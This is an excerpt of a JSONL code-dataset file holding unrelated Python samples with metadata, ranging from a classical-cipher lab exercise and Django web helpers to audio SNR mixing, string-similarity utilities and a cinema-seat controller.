phase\n","sub_path":"phantasy/facility/frib/virtaccel/flame.py","file_name":"flame.py","file_ext":"py","file_size_in_byte":41699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"463880263","text":"def from_head_to_tail(seq, n=1):\n return seq[n:] + seq[:n]\n\n\ndef get_position(str1, str2):\n for i in range(len(str1)):\n if str1[i] != str2[i]:\n return i\n\n\nalphabet = [chr(i) for i in range(ord('а'), ord('а') + 32)]\n\nmatrix = [from_head_to_tail(alphabet)]\nfor i in range(len(alphabet) - 1):\n matrix.append(from_head_to_tail(matrix[i]))\n\nvariant = {0: ('вапр', 'вакш', 'и'),\n 1: ('юбьшхшцяыщгощмхо', 'юбофхесшъдкхкыйжщ', 'а'),\n 2: ('ььыйдбэоетлыб', 'ььыбшеяъззлнуы', 'а'),\n 3: ('нэфцшкмхыжэыптгг', 'нэсхчщлнцэзюэрудд', 'о'),\n 4: ('ховчаамцыо', 'хпыэюдшайчр', 'о')}\n\nfor k, v in sorted(variant.items(), key=lambda x: x[0]):\n e1, e2, symbol = v\n\n position = get_position(e1, e2)\n key = []\n message = [symbol]\n\n for position in range(position, len(e1)):\n i = alphabet.index(message[-1])\n n = matrix[i].index(e2[position])\n 
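# Editor's note (added commentary, not part of the original source): matrix
# above is a tabula recta built from cyclic shifts of the 32-letter Russian
# alphabet, so matrix[i].index(c) asks which column produces ciphertext c in
# row i. The loop appears to alternate between the two related ciphertexts:
# the last recovered message letter selects the row used to pull the next key
# letter out of e2, and that key letter selects the row used to decrypt the
# next message letter from e1.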
key.append(alphabet[n])\n\n i = alphabet.index(key[-1])\n n = matrix[i].index(e1[position])\n message.append(alphabet[n])\n\n print(f\"Вариант {k}: {''.join(message)}\")\n\nprint('--------------------------------------------')\n\nvariant = {0: ('А', 'Б', 'ЛСКРФРЕСБОНБ'),\n # ПРОВЕРКА СТОЙКОСТИ ШИФРA\n 1: ('Б', 'В', 'СТСДИТМГУХРМНРУХКЫЛЦУВ'),\n # СЕГОДНЯ НЕБОЛЬШОЙ ДОЖДЬ\n 2: ('А', 'Б', 'ТЗДРЕОБОЗГПМЮЩПЛЕПЗЕЮ'),\n # ЗАВТРА ТОЖЕ БУДЕТ ДОЖДЬ\n 3: ('А', 'В', 'ИГЕУУБУСЗИДФЗИХЕСЗЕЯ')}\n\nfor k, v in sorted(variant.items(), key=lambda x: x[0]):\n s1, s2, enc = v\n\n first_half, second_half = [], []\n for e in enc:\n i1 = alphabet.index(s1.lower())\n n1 = matrix[i1].index(e.lower())\n first_half.append(alphabet[n1])\n\n i2 = alphabet.index(s2.lower())\n n2 = matrix[i2].index(e.lower())\n second_half.append(alphabet[n2])\n\n print(f'Вариант: {k}')\n print(''.join(first_half).upper())\n print(''.join(second_half).upper())\n\nprint('--------------------------------------------')\n\nvariant = {1: ('А', 'Г', 'Е', 'вфоддкбфижцчаоимдчум'),\n #\n 2: ('Б', 'В', 'Г', 'вецтффтуспсрзгнвнцлоз'),\n #\n 3: ('А', 'Б', 'В', 'ФТЫЮУФДУСЭШЬЪОГАЪФЕЦРЭЬО'),\n #\n 4: ('А', 'Б', 'В', 'наючроржнннрщыбп')}\n\nfor k, v in sorted(variant.items(), key=lambda x: x[0]):\n s1, s2, s3, enc = v\n\n first, second, third = [], [], []\n for e in enc:\n i1 = alphabet.index(s1.lower())\n n1 = matrix[i1].index(e.lower())\n first.append(alphabet[n1])\n\n i2 = alphabet.index(s2.lower())\n n2 = matrix[i2].index(e.lower())\n second.append(alphabet[n2])\n\n i3 = alphabet.index(s3.lower())\n n3 = matrix[i3].index(e.lower())\n third.append(alphabet[n3])\n\n print(f'Вариант: {k}')\n print(''.join(first).upper())\n print(''.join(second).upper())\n print(''.join(third).upper())\n","sub_path":"lab3_oibis.py","file_name":"lab3_oibis.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"457430220","text":"#!/usr/bin/env python2\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 19 10:57:38 2016\r\nTo check raw file count in tarballs, because ¨ls¨ takes eons\r\n@author: Dinesh\r\n\r\nUsage:\r\ncommand line arguments - {source folder}\r\n\r\n\"\"\"\r\nfrom __future__ import print_function\r\nimport tarfile\r\nimport os, sys\r\n\r\n\r\n\r\ndef find_file_contents(source_dir):\r\n total = 0\r\n archives = [item for item in os.listdir(source_dir)]\r\n \r\n for item in archives:\r\n if \"tar\" in item:\r\n archive = tarfile.open(os.path.join(source_dir, item))\r\n archive_items = archive.getmembers()\r\n total = total + len(archive_items)\r\n print (len(archive_items))\r\n print (\"Total = \"+ str(total))\r\n \r\n \r\n\r\n \r\n\r\nif __name__== \"__main__\":\r\n \r\n root_dir = sys.argv[1]\r\n \r\n print (\"Reading contents of \" +root_dir)\r\n find_file_contents(root_dir)\r\n \r\n","sub_path":"abb_deeplearning_keras/Source_code/image_count.py","file_name":"image_count.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"357295042","text":"import urllib\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.utils.hashcompat import md5_constructor\n\nfrom jingo import register\nfrom jinja2 import Markup\n\nfrom flicks.base.util import absolutify\n\n\nGRAVATAR_URL = getattr(settings, 'GRAVATAR_URL', 'http://www.gravatar.com')\nDEFAULT_GRAVATAR = absolutify(settings.DEFAULT_GRAVATAR)\n\n\n@register.function\ndef 
gravatar_url(arg, size=80):\n if isinstance(arg, User):\n email = arg.email\n else: # Treat as email\n email = arg\n\n url = '%(url)s/avatar/%(email_hash)s?%(options)s' % {\n 'url': GRAVATAR_URL,\n 'email_hash': md5_constructor(email.lower()).hexdigest(),\n 'options': urllib.urlencode({'s': str(size),\n 'default': DEFAULT_GRAVATAR})\n }\n\n return url\n\n\n@register.function\ndef gravatar_img(arg, size=80, img_class=None):\n return Markup('<img class=\"%(class)s\" src=\"%(src)s\">' % {\n 'class': img_class,\n 'src': gravatar_url(arg, size=size)\n })\n","sub_path":"flicks/users/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"580728666","text":"from VirtualJudgeSpider import config\nfrom VirtualJudgeSpider import control\nfrom celery import shared_task\nfrom django.db import DatabaseError\n\nfrom support.dispatcher import ConfigDispatcher\nfrom support.models import Language\nfrom support.models import Support\n\n\n@shared_task\ndef update_oj_status(oj_name):\n status = control.Controller(oj_name).check_status()\n oj = Support.objects.get(oj_name=oj_name)\n if status:\n oj.oj_status = 'SUCCEED'\n else:\n oj.oj_status = 'FAILED'\n oj.save()\n\n\n@shared_task\ndef update_language_task(remote_oj):\n if ConfigDispatcher.choose_config('UPDATE_LANGUAGE_' + str(remote_oj).upper(), 'TRUE'):\n\n account = ConfigDispatcher.choose_account(remote_oj)\n if account is None:\n ConfigDispatcher.release_config('UPDATE_LANGUAGE_' + str(remote_oj).upper(), 'FALSE')\n return\n remote_account = config.Account(username=account.oj_username, password=account.oj_password,\n cookies=account.cookies)\n controller = control.Controller(remote_oj)\n langs = controller.find_language(account=remote_account)\n print(remote_oj, langs)\n account.cookies = controller.get_cookies()\n account.save()\n ConfigDispatcher.release_account(account.id)\n\n if langs is None:\n ConfigDispatcher.release_config('UPDATE_LANGUAGE_' + str(remote_oj).upper(), 'FALSE')\n return\n Language.objects.filter(oj_name=remote_oj).delete()\n for lang, lang_name in langs.items():\n try:\n language = Language(oj_name=remote_oj, oj_language=lang, oj_language_name=lang_name)\n language.save()\n except DatabaseError:\n pass\n ConfigDispatcher.release_config('UPDATE_LANGUAGE_' + str(remote_oj).upper(), 'FALSE')\n","sub_path":"support/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"223133637","text":"from Node import Node\n\nclass Queue(object):\n 'Generic Queue class'\n\n \"\"\"\n @param t_front: node to become front of queue\n \"\"\"\n def __init__(self, t_front=None):\n # Avoid a mutable default argument: construct the sentinel node per instance.\n self.front = t_front if t_front is not None else Node()\n self.size = 0\n\n \"\"\"\n @param t_node: the node to be enqueued\n \"\"\"\n def enqueue(self, t_node):\n if self.front.value == None:\n self.front = t_node\n else:\n current_node = self.front\n while current_node.next != None:\n current_node = current_node.next\n current_node.next = t_node\n self.size += 1\n\n \"\"\"\n dequeues the node at the front of the queue\n \"\"\"\n def dequeue(self):\n if self.front.value == None:\n print('Queue is already empty, front node not removed.')\n else:\n # Restore the sentinel node when the last real node is removed.\n self.front = self.front.next if self.front.next is not None else Node()\n self.size -= 1\n\n \"\"\"\n returns node value at the front of the queue\n \"\"\"\n def peek(self):\n return self.front.value\n\n 
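# Editor's note (illustrative usage, not part of the original source; assumes
# Node(value) constructs a node holding `value`):
#
#     q = Queue()
#     q.enqueue(Node(1))
#     q.enqueue(Node(2))
#     q.peek()     # -> 1
#     q.dequeue()  # drops the node holding 1
#     q.peek()     # -> 2
#
# The default front is a sentinel Node whose value is None, which is why
# enqueue() and dequeue() compare self.front.value against None.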
\"\"\"\n prints value of each node in queue\n \"\"\"\n def printQueue(self):\n current_node = self.front\n while current_node != None:\n print(current_node.value)\n current_node = current_node.next\n","sub_path":"Queue.py","file_name":"Queue.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"350202962","text":"from __future__ import division\nfrom similarity.levenshtein import Levenshtein\nfrom similarity.jaccard import Jaccard\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport numpy as np\nimport datetime\nimport re\nfrom datetime import tzinfo\nfrom dateutil.parser import parse\nimport pytz\nfrom numpy import trapz\nimport re\nfrom scipy.ndimage import gaussian_filter\nfrom numpy import matlib\nfrom copy import deepcopy\nimport nltk\nfrom nltk import ngrams\nimport matplotlib.pyplot as plt\nfrom datautils import *\n\ndef get_date_type(date_str):\n separator = ''\n if '.' in date_str:\n separator = '.'\n elif '\\\\' in date_str:\n separator = '\\\\'\n elif '/' in date_str:\n separator = '/'\n elif '-' in date_str:\n separator = '-'\n else:\n return None\n try:\n date_parts = [ d.strip() for d in date_str.split(separator) ]\n if re.match('\\\\d{4}[-\\\\.\\\\\\\\]\\\\d{1,2}[-\\\\.\\\\\\\\]\\\\d{1,2}', date_str):\n return datetime.datetime.strptime(date_str, '%Y' + separator + '%m' + separator + '%d').date()\n if re.match('\\\\d{1,2}[-\\\\.\\\\\\\\]\\\\d{1,2}[-\\\\.\\\\\\\\]\\\\d{4}', date_str):\n return datetime.datetime.strptime(date_str, '%d' + separator + '%m' + separator + '%Y').date()\n if re.match('\\\\d{2}[-\\\\.\\\\\\\\]\\\\d{1,2}[-\\\\.\\\\\\\\]\\\\d{1,2}', date_str):\n p = re.compile('\\\\d+')\n splitted_date = p.findall(date_str)\n if int(splitted_date[0]) < 32 and int(splitted_date[1]) < 13:\n return datetime.datetime.strptime(date_str, '%d' + separator + '%m' + separator + '%y').date()\n if int(splitted_date[0]) > 32:\n return datetime.datetime.strptime(date_str, '%y' + separator + '%m' + separator + '%d').date()\n try:\n return datetime.datetime.strptime(date_str, '%d' + separator + '%m' + separator + '%y').date()\n except:\n try:\n return datetime.datetime.strptime(date_str, '%y' + separator + '%m' + separator + '%d').date()\n except:\n display('Unknown pattern or invalid date: %s' % date_str)\n return None\n\n else:\n return parse(date_str, fuzzy=True)\n except:\n f = open('unparseddates.txt', 'a')\n f.write(date_str + '\\n')\n f.close()\n return None\n\n\ndef get_num_equal(num1, num2):\n if num1 == 'nan' or num2 == 'nan' or num1 == '' or num2 == '':\n return -1.0\n try:\n num1_ = float(num1)\n num2_ = float(num2)\n if num1_ == num2_:\n return 1.0\n return 0.0\n except:\n return -1\n\ndef get_norm_sim(num1,num2,max_value, min_value):\n if num1 == 'nan' or num2 == 'nan' or num1 == '' or num2 == '':\n return -1.0\n try:\n num1_ = float(num1)\n num2_ = float(num2)\n abs_difference = abs(num1_ - num2_)\n return 1-(abs(abs_difference - min_value)/(max_value-min_value))\n except:\n return -1\n\ndef get_abs_diff(num1, num2):\n if num1 == 'nan' or num2 == 'nan' or num1 == '' or num2 == '':\n return -1.0\n try:\n num1_ = float(num1)\n num2_ = float(num2)\n return abs(num1_ - num2_)\n except:\n return -1\n\ndef get_jaccard_token_sim(str1, str2):\n if str1 == 'nan' or str2 == 'nan' or str1 == '' or str2 == '':\n return -1.0\n else:\n return 1-nltk.jaccard_distance(set(str1), set(str2))\n \n \ndef get_jaccard_sim(str1, str2):\n a = set(str1.split())\n b = set(str2.split())\n c = 
a.intersection(b)\n if str1 == 'nan' or str2 == 'nan' or str1 == '' or str2 == '':\n return -1.0\n else:\n return float(len(c)) / float(len(a) + len(b) - len(c))\n\n\ndef get_relaxed_jaccard_sim(str1, str2, n_grams=1):\n if str1 == 'nan' or str2 == 'nan' or str1 == '' or str2 == '' :\n return -1.0\n a = set(str1.split())\n b = set(str2.split())\n if not a or not b: return -1\n c = []\n for a_ in a:\n for b_ in b:\n if get_levenshtein_sim(a_, b_) > 0.7:\n c.append(a_)\n intersection = len(c)\n min_length = min(len(a), len(b))\n if intersection > min_length:\n intersection = min_length\n return float(intersection) / float(len(a) + len(b) - intersection)\n\n\ndef get_containment_sim(str1, str2, allowTokenBased= True):\n #it's not really a long string necessarily but it does not make sense to do word based containment\n if ((len(set(str1.split()))>1 and len(set(str2.split()))>1) or not allowTokenBased): \n a = set(str1.split())\n b = set(str2.split())\n else: #for single words we consider the tokens\n if (allowTokenBased):\n a = set(str1)\n b = set(str2)\n \n \n c = a.intersection(b)\n if str1 == 'nan' or str2 == 'nan' or str1 == '' or str2 == '':\n return -1.0\n elif len(a) == 0 or len(b) == 0:\n return -1.0\n else:\n return float(len(c)) / float(min(len(a), len(b)))\n\n\ndef get_levenshtein_sim(str1, str2):\n levenshtein = Levenshtein()\n if str1 == 'nan' or str2 == 'nan' or str1 == '' or str2 == '':\n return -1.0\n else:\n max_length = max(len(str1), len(str2))\n return 1.0 - levenshtein.distance(str1, str2) / max_length\n\n\ndef get_missing(str1, str2):\n if str1 == 'nan' or str2 == 'nan' or str1 == '' or str2 == '' :\n return 1.0\n else:\n return 0.0\n\n\ndef get_overlap_sim(str1, str2):\n if str1 == 'nan' or str2 == 'nan' or str1 == '' or str2 == '':\n return -1.0\n elif str1 == str2:\n return 1.0\n else:\n return 0.0\n\n\ndef get_cosine_word2vec(str1, str2, model):\n if str1 == 'nan' or str2 == 'nan' or str1 == '' or str2 == '':\n return -1.0\n elif str1.replace(' ', '') in model.vocab and str2.replace(' ', '') in model.vocab:\n return model.similarity(str1.replace(' ', ''), str2.replace(' ', ''))\n else:\n return 0.0\n\n\ndef get_cosine_tfidf(tfidf_scores_ids, sourceID, targetID):\n try:\n source_index = np.where(tfidf_scores_ids['ids'] == sourceID)\n target_index = np.where(tfidf_scores_ids['ids'] == targetID)\n score = cosine_similarity(tfidf_scores_ids['scores'][source_index].todense(), tfidf_scores_ids['scores'][target_index].todense())\n except:\n import pdb; pdb.set_trace();\n return score[0][0]\n \n\ndef calculateTFIDF(records, grams=1): \n try:\n records_data = records['data']\n concat_records = []\n for row in records_data:\n if (isinstance(row,np.ndarray)): # tfidf based on more that one features\n concat_row = ''\n for value in row:\n if not pd.isnull(value):\n if type(value) is str:\n if value.lower() != 'nan':\n value = re.sub('[^A-Za-z0-9\\s\\t\\n]+', '', str(value)) #think of product model names e.g. 
ak-123\n concat_row += ' ' + value\n else: # tfidf based on one feature \n value = re.sub('[^A-Za-z0-9\\s\\t\\n]+', '', str(value))\n concat_row += ' ' + str(value)\n\n concat_records.append(concat_row.lower())\n else: \n if pd.isnull(row):\n concat_records.append(\"\")\n else:\n value = re.sub('[^A-Za-z0-9\\s\\t\\n]+', '', str(row))\n concat_records.append(value.lower())\n\n tf_idfscores = TfidfVectorizer(encoding='latin-1', ngram_range=(grams,grams)).fit_transform(concat_records)\n tf_idf = dict()\n tf_idf['ids'] = records['ids']\n tf_idf['scores'] = tf_idfscores\n except Exception as e:\n print(str(e))\n import pdb;pdb.set_trace();\n return tf_idf\n","sub_path":"code/similarityutils.py","file_name":"similarityutils.py","file_ext":"py","file_size_in_byte":7886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"194163444","text":"from django.urls import path\nfrom .views.provider.views import *\nfrom .views.product.views import *\nfrom .views.purchase.views import *\nfrom .views.inventory.views import *\n\nurlpatterns = [\n # provider\n path('provider/', ProviderListView.as_view(), name='provider_list'),\n path('provider/add/', ProviderCreateView.as_view(), name='provider_create'),\n path('provider/update//', ProviderUpdateView.as_view(), name='provider_update'),\n path('provider/delete//', ProviderDeleteView.as_view(), name='provider_delete'),\n # product\n path('product/', ProductListView.as_view(), name='product_list'),\n path('product/add/', ProductCreateView.as_view(), name='product_create'),\n path('product/update//', ProductUpdateView.as_view(), name='product_update'),\n path('product/delete//', ProductDeleteView.as_view(), name='product_delete'),\n # purchases\n path('purchase/', PurchaseListView.as_view(), name='purchase_list'),\n path('purchase/add/', PurchaseCreateView.as_view(), name='purchase_create'),\n path('purchase/delete//', PurchaseDeleteView.as_view(), name='purchase_delete'),\n # inventory\n path('inventory/', InventoryListView.as_view(), name='inventory_list'),\n]\n","sub_path":"app/core/erp/scm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"219204161","text":"from test_base import MainTestCase\nfrom main.models import MetaData\nfrom main.views import show, edit, download_metadata\nfrom django.core.urlresolvers import reverse\nimport os\n\nclass TestFormMetadata(MainTestCase):\n\n def setUp(self):\n MainTestCase.setUp(self)\n self._create_user_and_login()\n self._publish_transportation_form_and_submit_instance()\n self.url = reverse(show, kwargs={\n 'username': self.user.username,\n 'id_string': self.xform.id_string\n })\n self.edit_url = reverse(edit, kwargs={\n 'username': self.user.username,\n 'id_string': self.xform.id_string\n })\n\n def _add_metadata(self, data_type='doc'):\n name = 'transportation.xls'\n path = os.path.join(self.this_directory, \"fixtures\",\n \"transportation\", name)\n with open(path) as doc_file:\n post_data = {}\n post_data[data_type] = doc_file\n response = self.client.post(self.edit_url, post_data)\n self.doc = MetaData.objects.all().reverse()[0]\n self.doc_url = reverse(download_metadata, kwargs={\n 'username': self.user.username,\n 'id_string': self.xform.id_string,\n 'data_id': self.doc.id})\n return name\n\n def test_adds_supporting_doc_on_submit(self):\n count = len(MetaData.objects.filter(xform=self.xform,\n data_type='supporting_doc'))\n name = 
self._add_metadata()\n self.assertEquals(count + 1, len(\n MetaData.objects.filter(xform=self.xform,\n data_type='supporting_doc')))\n\n def test_shows_supporting_doc_after_submit(self):\n name = self._add_metadata()\n response = self.client.get(self.url)\n self.assertContains(response, name)\n self.xform.shared = True\n self.xform.save()\n response = self.anon.get(self.url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, name)\n\n def test_download_supporting_doc(self):\n name = self._add_metadata()\n response = self.client.get(self.doc_url)\n self.assertEqual(response.status_code, 200)\n\n def test_no_download_supporting_doc_for_anon(self):\n name = self._add_metadata()\n response = self.anon.get(self.doc_url)\n self.assertEqual(response.status_code, 403)\n\n def test_shared_download_supporting_doc_for_anon(self):\n name = self._add_metadata()\n self.xform.shared = True\n self.xform.save()\n response = self.anon.get(self.doc_url)\n self.assertEqual(response.status_code, 200)\n\n def test_user_source_edit_updates(self):\n desc = 'Snooky'\n response = self.client.post(self.edit_url, {'source': desc},\n HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n self.assertEqual(response.status_code, 200)\n self.assertEqual(MetaData.source(self.xform).data_value, desc)\n\n def test_upload_source_file(self):\n name = self._add_metadata('source')\n self.assertNotEqual(MetaData.source(self.xform).data_file, None)\n\n def test_upload_source_file_set_value_to_name(self):\n name = self._add_metadata('source')\n self.assertEqual(MetaData.source(self.xform).data_value, name)\n\n def test_upload_source_file_keep_name(self):\n desc = 'Snooky'\n response = self.client.post(self.edit_url, {'source': desc},\n HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n self.assertEqual(response.status_code, 200)\n name = self._add_metadata('source')\n self.assertNotEqual(MetaData.source(self.xform).data_file, None)\n self.assertEqual(MetaData.source(self.xform).data_value, desc)\n","sub_path":"main/tests/test_form_metadata.py","file_name":"test_form_metadata.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"651327427","text":"import os\nimport sys\nimport librosa\nimport soundfile\nfrom datetime import datetime\nimport tensorflow as tf\n\n\nSR_TARGET = 16000\nMIXED_DIR = os.path.join(\"data\", \"mixed\")\nif not os.path.exists(MIXED_DIR):\n os.makedirs(MIXED_DIR)\n\n\ndef parse_args():\n speech_file = os.path.join(\"data\", \"speech\", \"mic_F04_si1021.wav\")\n noise_file = os.path.join(\"data\", \"noise\", \"doesnotexist.wav\")\n snr_targets = list(range(-10, 26, 5))\n if len(sys.argv) > 3:\n speech_file = sys.argv[1]\n noise_file = sys.argv[2]\n snr_targets = [int(i) for i in sys.argv[3:]]\n return speech_file, noise_file, snr_targets\n\n\ndef mix_noise_speech(speech_path, noise_path, snr_target):\n # Load wav files\n speech, sr_speech = librosa.load(path=speech_path, sr=SR_TARGET, mono=True)\n noise, sr_noise = librosa.load(path=noise_path, sr=SR_TARGET, mono=True)\n\n # Mix speech with noise\n speech_pow = tf.math.reduce_euclidean_norm(speech)\n noise_pow = tf.math.reduce_euclidean_norm(noise)\n snr_current = 20.0 * tf.math.log(speech_pow / noise_pow) / tf.math.log(10.0)\n noise_snr_adjusted = noise * tf.math.pow(10.0, (snr_current - snr_target) / 20.0)\n length = min(len(speech), len(noise_snr_adjusted))\n noisy_speech = speech[-length:] + noise_snr_adjusted[-length:]\n\n # Write out mixed audio to file\n 
out_path = os.path.join(\n MIXED_DIR,\n f'{datetime.now().strftime(\"%Y%m%d-%H%M%S\")}_mixed_snr_{snr_target}.wav',\n )\n print(f\"Mixed file written to {out_path}\")\n soundfile.write(\n file=out_path,\n data=noisy_speech,\n samplerate=SR_TARGET,\n format=\"WAV\",\n subtype=\"PCM_16\",\n )\n\n\ndef main():\n speech_file, noise_file, snr_targets = parse_args()\n for snr in snr_targets:\n mix_noise_speech(speech_file, noise_file, snr)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/snr_tester/snr_tester.py","file_name":"snr_tester.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"491914599","text":"from limite.tela_poltrona import TelaPoltrona\nfrom entidade.poltrona import Poltrona\n\n\nclass ControladorPoltronas:\n\n\tdef __init__(self, controlador_sistema):\n\t\tself.__controlador_sistema = controlador_sistema\n\t\tself.__poltronas = []\n\t\tself.__tela_poltrona = TelaPoltrona()\n\t\tself.__contador = 0\n\n\tdef pega_poltrona_por_id(self, id_poltrona: int):\n\t\tfor poltrona in self.__poltronas:\n\t\t\tif poltrona.id_poltrona == id_poltrona:\n\t\t\t\treturn poltrona\n\t\treturn None\n\n\tdef retornar(self):\n\t\tself.__controlador_sistema.abre_tela()\n\n\tdef incluir_poltrona(self):\n\t\tdados_poltrona = self.__tela_poltrona.pega_dados_poltrona()\n\t\tpoltrona = Poltrona(\n\t\t\tself.__contador+1,\n\t\t\tdados_poltrona[\"fileira\"],\n\t\t\tdados_poltrona[\"acento\"]\n\t\t)\n\t\tself.__poltronas.append(poltrona)\n\t\tself.__contador += 1\n\n\tdef alterar_poltrona(self):\n\t\tself.lista_poltronas()\n\n\t\tif len(self.__poltronas) > 0:\n\n\t\t\tid_poltrona = self.__tela_poltrona.seleciona_poltrona()\n\t\t\tpoltrona = self.pega_poltrona_por_id(int(id_poltrona))\n\n\t\t\tif poltrona is not None:\n\t\t\t\tnovos_dados_poltrona = self.__tela_poltrona.pega_dados_poltrona()\n\t\t\t\tpoltrona.fileira = novos_dados_poltrona[\"fileira\"]\n\t\t\t\tpoltrona.acento = novos_dados_poltrona[\"acento\"]\n\t\t\t\tself.lista_poltronas()\n\t\t\telse:\n\t\t\t\tself.__tela_poltrona.mostra_mensagem(\n\t\t\t\t\t\"ATENÇÃO: poltrona não existente\"\n\t\t\t\t)\n\t\telse:\n\t\t\tpass # já está mostrando a mensagem na listagem de poltronas, por isso que não estou printando novamente\n\n\tdef lista_poltronas(self):\n\t\tself.__tela_poltrona.mostra_mensagem(\"\\n\\033[1;96m-------==X( LISTA POLTRONAS )X==-------\\033[0;0m\")\n\n\t\tif len(self.__poltronas) > 0:\n\t\t\tfor poltrona in self.__poltronas:\n\t\t\t\tself.__tela_poltrona.mostra_poltrona({\n\t\t\t\t\t\"fileira\": poltrona.fileira,\n\t\t\t\t\t\"acento\": poltrona.acento,\n\t\t\t\t\t\"id_poltrona\": poltrona.id_poltrona\n\t\t\t\t})\n\t\telse:\n\t\t\tself.__tela_poltrona.mostra_mensagem('\\033[1;31mNão há poltronas disponíveis, crie uma antes.\\033[0;0m')\n\n\tdef excluir_poltrona(self):\n\n\t\tself.lista_poltronas()\n\n\t\tif len(self.__poltronas) > 0:\n\n\t\t\tid_poltrona = self.__tela_poltrona.seleciona_poltrona()\n\t\t\tpoltrona = self.pega_poltrona_por_id(int(id_poltrona))\n\n\t\t\tif poltrona is not None:\n\t\t\t\tself.__poltronas.remove(poltrona)\n\t\t\t\tself.lista_poltronas()\n\t\t\telse:\n\t\t\t\tself.__tela_poltrona.mostra_mensagem(\n\t\t\t\t\t\"ATENÇÃO: poltrona não existente\"\n\t\t\t\t)\n\t\telse:\n\t\t\tpass # já está mostrando a mensagem na listagem de poltronas, por isso que não estou printando novamente\n\n\tdef abre_tela(self):\n\t\tlista_opcoes = {\n\t\t\t0: self.retornar,\n\t\t\t1: self.incluir_poltrona,\n\t\t\t2: 
self.alterar_poltrona,\n\t\t\t3: self.lista_poltronas,\n\t\t\t4: self.excluir_poltrona\n\t\t}\n\n\t\twhile True:\n\t\t\tlista_opcoes[self.__tela_poltrona.tela_opcoes()]()\n\n\t@property\n\tdef poltronas(self):\n\t\treturn self.__poltronas","sub_path":"controle/controlador_poltronas.py","file_name":"controlador_poltronas.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"421030953","text":"# global\n\n\n\nNames=['敌法师', '斧王', '祸乱之源', '嗜血狂魔', '水晶室女', '卓尔游侠', '撼地者',\n '主宰', '米拉娜', '变体精灵', '影魔', '幻影长矛手', '帕克', '帕吉', '剃刀',\n '沙王', '风暴之灵', '斯温', '小小', '复仇之魂', '风行者', '宙斯', '昆卡',\n '莉娜', '莱恩', '暗影萨满', '斯拉达', '潮汐猎人', '巫医', '巫妖', '力丸',\n '谜团', '修补匠', '狙击手', '瘟疫法师', '术士', '兽王', '痛苦女王', '剧毒术士',\n '虚空假面', '冥魂大帝', '死亡先知', '幻影刺客', '帕格纳', '圣堂刺客', '冥界亚龙',\n '露娜', '龙骑士', '戴泽', '发条技师', '拉席克', '先知', '噬魂鬼', '黑暗贤者',\n '克林克兹', '全能骑士', '魅惑魔女', '哈斯卡', '暗夜魔王', '育母蜘蛛', '赏金猎人',\n '编织者', '杰奇洛', '蝙蝠骑士', '陈', '幽鬼', '远古冰魄', '末日使者', '熊战士',\n '裂魂人', '矮人直升机', '炼金术士', '祈求者', '沉默术士', '殁境神蚀者', '狼人',\n '酒仙', '暗影恶魔', '德鲁伊', '混沌骑士', '米波', '树精卫士', '食人魔魔法师',\n '不朽尸王', '拉比克', '干扰者', '司夜刺客', '娜迦海妖', '光之守卫', '艾欧',\n '维萨吉', '斯拉克', '美杜莎', '巨魔战将', '半人马战行者', '马格纳斯', '伐木机',\n '钢背兽', '巨牙海民', '天怒法师', '亚巴顿', '上古巨神', '军团指挥官', '工程师',\n '灰烬之灵', '大地之灵', '孽主', '恐怖利刃', '凤凰', '神谕者', '寒冬飞龙', '天穹守望者']\n\n\nColumn1='英雄'\n\nColumn2='胜率'\n\nColumn3='使用频率'\n\n","sub_path":"scripts/HeroList.py","file_name":"HeroList.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"4180398","text":"import gzip\nimport re\nimport os\nimport time\nfrom sys import argv\nimport concurrent.futures\n\nstartTime = time.time()\nchar = '\\n' + ('*' * 70) + '\\n'\n\n#Input file or list of files\ninputFile = argv[1]\n\n#Create a dictionary of files that need to be combined into one vcf file\nfileDict = {}\nwith open(inputFile) as sampleFile:\n header = sampleFile.readline()\n headerList = header.rstrip().split(\"\\t\")\n fileNameIndex = headerList.index(\"file_name\")\n familyIdIndex = headerList.index(\"family_id\")\n for sample in sampleFile:\n sampleData = sample.rstrip(\"\\n\").split(\"\\t\")\n fileName = sampleData[fileNameIndex]\n sampleFamilyId = sampleData[familyIdIndex]\n shortName = re.findall(r\"([\\w\\-/]+)\\.?.*\\.?.*\\.gz\", fileName)[0]\n actualFileName = \"{}_test/{}_parsed.vcf.gz\".format(sampleFamilyId, shortName)\n if sampleFamilyId not in fileDict:\n fileDict[sampleFamilyId] = [actualFileName]\n else:\n fileDict[sampleFamilyId].append(actualFileName)\n\nprobandDict = {}\nparentDict = {}\nwith open(inputFile) as sampleFile:\n header = 